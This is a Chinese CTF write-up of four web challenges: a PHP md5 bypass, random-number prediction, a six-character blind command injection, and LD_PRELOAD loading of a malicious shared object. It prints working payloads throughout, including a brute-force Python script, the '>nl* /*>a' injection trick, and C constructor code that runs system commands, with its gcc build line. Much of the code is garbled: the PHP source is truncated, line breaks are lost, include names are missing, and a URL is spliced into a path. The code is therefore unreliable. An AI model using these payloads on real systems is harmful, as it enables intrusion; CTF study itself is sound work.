前言
这次比赛结束有一段时间了,在此总结一些当时没有做出来的web题解。也当是收集到一些学习经验。
funmd5(php代码审计)
打开题目,是一段php代码:
"; echo $flag; } else{ echo $md5[0]; echo "oh!no!maybe you need learn more PHP!"; } } else{ echo "this is your md5:$md5[0]
"; echo "maybe you need more think think!"; }}else{ highlight_file(__FILE__); $sub=strlen($md5[0]); echo substr($guessmd5,0,5)."
"; echo "plase give me the md5!";}?>
当时困扰我的是数组的传参问题,现在也算是明白了。get传值,代码很容易读懂,看第一层限制:
$md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);
不想0e被替换,那么用%0a换行绕过就行了,那么看第二层限制:
$time=time();$guessmd5=md5($time);$sub=substr($time,-1);$md5[0]=substr($md5[0],$sub);if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
time函数返回时间戳,找一个字符串的md5值等于它本身,来满足第一个弱比较,但是在此之前会对md5[0]有一个截取操作,从哪截取与时间戳的最后一个数字有关,先不用管,看第二个满足条件,需要去强等时间戳的md5值,那么我们可以卡个满足条件的时间手动发包,但是比较考验手速,用python发包更加的稳。
import requestsimport hashlibimport timefor i in range(10000):times = str(int(time.time()))md5 = hashlib.md5(times.encode())md5value = md5.hexdigest()url = "http://43.143.7.97:28023/index.php?md5[]=%0a%0d0e215962017&md5[1]={}".format(md5value)res = requests.get(url=url)if "NSS" in res.text:print(res.text)break
也是很快得出flag了。
phonecode(随机数预测)
知道考预测随机数,但是不知道怎么解题。题目中给的hint是由我们提交的phone控制的,就用它给的hint来爆破随机数种子,并且在code那里填写下一个随机数就可以得到flag。但是我试了很多次,预测出的随机数都得不出flag,看了别的师傅写的wp,在phone提交12345678909后返回的随机数来预测下一个随机数才能得到flag。 why?
题目中的php版本为7.2,所以用最后一个随机数种子预测出随机数,
最后提交预测的随机数就得出flag了。
ezrce(六字符无回显rce)
打开题目是一个命令执行接口,
限制了输入的字符最多为六个并且无回显,常规思路就是将命令执行结果写入文件,这一题比较坑的就是你命令执行成功了给你回显命令执行失败。并且写入的文件在tmp目录下。我们输入命令
ls />a
访问tmp目录下的a文件
尝试构造命令nl /*>a,这是七个字符。还有个更巧妙的方法,创建一个名为nl的文件,再用*将文件名当作命令执行。payload为
>nl* /*>a
访问/tmp/a,成功得到flag。
uploadandinject(恶意so文件加载)
打开题目先信息收集,题目提示访问hint.php,
提示我们有index.php的swp文件泄露,在url访问.index.php.swp,(做题时前面没加点,一直访问错误)访问url下载好文件打开是有乱码的,所以我们得用vim来打开它,使用命令:
vim -r index.php.swp
重点代码:
putenv("LD_PRELOAD=/var/www/html/https://blog.csdn.net/m0_62422842/article/details/$img_path");
它会将LD_PRELOAD环境变量指向我们可控的文件路径,一看见这个LD_PRELOAD环境变量,肯定就会想到让它来加载恶意so文件劫持函数执行命令。那么我们能够找到一个上传点去上传我们构造的恶意so代码,dirsearch扫一下目录,发现上传点upload/upload.php,
白名单限制,直接上传木马是不现实的,我们上传恶意so文件更改后缀名为jpg,对后续的加载是无影响的,但目前来说,还有一个点。一般情况来说,我们还需要再上传一个php文件,来让它调用mail这样的函数来开启一个新的进程,应为启动一个新的进程的时候,会去加载LD_PRELOAD指向的恶意so文件。很显然,上传点是上传不了php文件的,看了别的师傅写的wp,源代码中的
echo "
"
这一句代码可以触发加载so文件(具体原因不明),那么说到这里,所有条件就满足,这里直接编写网上最流行通杀恶意c代码,
#define _GNU_SOURCE#include #include #include __attribute__ ((__constructor__)) void payload (void){ unsetenv("LD_PRELOAD"); system("cat /f*");}
使用命令将c文件加载为so文件:
gcc -shared -fPIC hacker.c -o hacker.so
接下来就上传so文件然后加载它就能执行system命令进而得出flag。
来源地址:https://blog.csdn.net/m0_62422842/article/details/127709222